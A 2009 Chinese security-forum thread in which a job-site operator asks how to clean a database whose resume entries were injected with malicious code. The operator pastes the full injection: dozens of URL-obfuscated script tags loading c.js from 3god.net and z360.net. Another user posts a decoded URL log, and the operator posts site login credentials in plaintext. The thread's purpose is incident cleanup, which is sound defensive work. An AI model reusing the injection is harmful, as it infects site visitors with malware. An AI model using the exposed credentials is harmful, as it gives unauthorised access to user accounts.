瑞星卡卡安全论坛

首页 » 技术交流区 » 恶意网站交流 » 瑞星云安全网站联盟专版 » 辛集人才网 每个注册用户都被感染木马,可能数据库被植入恶意代码,如何解决?
辛集人才网 - 2009-9-11 21:49:00
辛集人才网 每个注册用户都被感染木马,可能数据库被植入恶意代码,如何解决?

用企业登录进入后,查看有联系方式的人才简历,都有木马被拦截,不知道如何清除,有可以帮忙的吗?求救哦。:kaka4:

本站:www.xinjiren.com
联系QQ:4466880

用户系统信息:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )
aaccbbdd - 2009-9-11 21:52:00
没看见异常
辛集人才网 - 2009-9-11 21:54:00
用企业用户登录:

用户名:haichuang
密码:woainimama

查看最新人才,任何一个人才的简历,都有拦截,请查看下。谢谢。

或者用人才的用户名登录:

用户名:zxd03
密码:woainimama

进入后,点基本资料,就会有提示的。
天才特工 - 2009-9-11 22:04:00
楼主可以对服务器进行全盘扫描(瑞星2010或瑞星2009最新版),要吗上传服务器的扫描日志也许是黑客的恶意入侵(并非挂马):kaka12:
aaccbbdd - 2009-9-11 22:19:00
http://www.janmeng.com/html/soft/fuzhu/200812/02-130.html

楼主可以试试
清除被挂恶意代码
辛集人才网 - 2009-9-11 22:28:00
每个人才注册的简历,自我评论里边,添加了如下代码:

.<script src=http://3god.ne%74/c.js></script><script src=http://3god.net/c.js></script><script src=http://3god.%4Eet/c.js></script><script src=http://3g%6Fd.net/c.js></script><script src=http://3god.ne%54/c.js></script><script src=http://3go%44.net/c.js></script><script src=http://3go%64.net/c.js></script><script src=http://3god.%4Eet/c.js></script><script src=http://3god.n%45t/c.js></script><script src=http://3god.ne%74/c.js></script><script src=http://3god.ne%74/c.js></script><script src=http://3god%2Enet/c.js></script><script src=http://3god.ne%54/c.js></script><script src=http://3god%2Enet/c.js></script><script src=http://3god.ne%54/c.js></script><script src=http://%33god.net/c.js></script><script src=http://z360.n%45t/c.j%73></script><script src=http://z3%360.net/c.%6As></script><script src=http://z360.%4Eet/c.js></script><script src=http://z360.%4Eet/c.%6As></script><script src=http://z3%360.net/c.js></script><script src=http://z%3360.net/c.js></script><script src=http://z36%30.net/c.js></script><script src=http://z%3360.net/%63.js></script><script src=http://z36%30.net/c.j%73></script><script src=http://z360.ne%54/c.js></script><script src=http://z36%30.net/c.j%73></script><script src=http://z3%360.net/c.js></script><script src=http://z36%30.net/c.js></script><script src=http://z360.%6Eet/c.js></script><script src=http://z360.ne%54/c.js></script><script src=http://%5A360.net/%63.js></script><script src=http://z36%30.net/c.js></script><script src=http://z%3360.net/c.js></script><script src=http://%7A360.net/c%2Ejs></script><script src=http://z360.%4Eet/c.js></script><script src=http://z360.ne%74/c%2Ejs></script><script src=http://z360.%6Eet/c.%4As></script><script src=http://%7A360.net/c%2Ejs></script><script src=http://z3%360.net/c.%6As></script><script src=http://z3%360.net/c.%6As></script><script src=http://z360%2Enet/%43.js></script><script src=http://z360.ne%54/%43.js></script><script src=http://z360.n%45t/c.j%73></script><script src=http://z360.net/c.j%53></script><script src=http://z360%2Enet/%43.js></script><script src=http://z360%2Enet/%43.js></script><script src=http://%5A360.net/%63.js></script><script src=http://z360.n%45t/c.js></script>
aaccbbdd - 2009-9-11 22:32:00
是呀

貌似
得吧.排除在外:kaka12:
辛集人才网 - 2009-9-11 22:38:00
如何解决数据库中数据被插入<script src=http://3god.net/c.js></script>脚本

数据库被注入还是比较棘手,既然数据库已被注入,那几乎所有的网站页面都被注入了。所以所有人才的简历都被植入了这个代码,不知道如何清除掉 SQL数据库里的每个代码,有3000多条,不知道如何是好??:kaka6:
aaccbbdd - 2009-9-11 22:48:00
5楼的工具不行么

先试试(建议先备份相关数据)
夲號ヱ被ジ盜 - 2009-9-11 23:00:00
:kaka6:
好像思路不对
network版主指点下吧
关于:hxxp://3god.net/c.js解密的日志(全体输出 -  42):

就是六楼提供的一段代码

Level  1>http://3god.nex/c.js
Level  1>http://3god.net/c.js
Level  1>http://3god.bet/c.js
Level  1>http://3gcd.net/c.js
Level  1>http://3god.nex/c.js
Level  1>http://3goh.net/c.js
Level  1>http://3goh.net/c.js
Level  1>http://3god.bet/c.js
Level  1>http://3god.nit/c.js
Level  1>http://3god.nex/c.js
Level  1>http://3god.nex/c.js
Level  1>http://3godnet/c.js
Level  1>http://3god.nex/c.js
Level  1>http://3godnet/c.js
Level  1>http://3god.nex/c.js
Level  1>http://?god.net/c.js
Level  1>http://z3:0.net/c.fs
Level  1>http://z360.bet/c.js
Level  1>http://z360.bet/c.fs
Level  1>http://z3:0.net/c.js
Level  1>http://z?60.net/c.js
Level  1>http://z?60.net/o.js
Level  1>http://z360.nex/c.js
Level  1>http://z3:0.net/c.js
Level  1>http://z360.bet/c.js
Level  1>http://z360.nex/c.js
Level  1>http://v360.net/o.js
Level  1>http://z?60.net/c.js
Level  1>http://v360.net/cjs
Level  1>http://z360.bet/c.js
Level  1>http://z360.nex/cjs
Level  1>http://z360.bet/c.fs
Level  1>http://v360.net/cjs
Level  1>http://z3:0.net/c.fs
Level  1>http://z3:0.net/c.fs
Level  1>http://z360net/o.js
Level  1>http://z360.nex/o.js
Level  1>http://z360.net/c.j_
Level  1>http://z360net/o.js
Level  1>http://z360net/o.js
Level  1>http://v360.net/o.js
Level  1>http://z360.nit/c.js

日志由 Redoce1.9第36次修正版于 2009-9-11 22:59:05 生成。
小菜头JK_250 - 2009-9-12 0:53:00
:kaka6: URL识别漏了...能点击
辛集人才网 - 2009-9-14 19:04:00
:kaka2: 那个工具不行,感谢大家关注,还是没有办法清除,继续求救哦。:kaka4:
跑步的鱼儿 - 2009-9-15 18:24:00
去数据库中写替换语句更新所有被更改的记录 替换脚本的内容!
辛集人才网 - 2009-9-21 4:40:00
可以想起说明下如何操作吗?
networkedition - 2009-9-21 9:12:00
用update命令吧,具体联系一下数据库维护人员。
upate 表名 set 字段=字段 类似语句:kaka6:
1
查看完整版本: 辛集人才网 每个注册用户都被感染木马,可能数据库被植入恶意代码,如何解决?
© 2000 - 2024 Rising Corp. Ltd.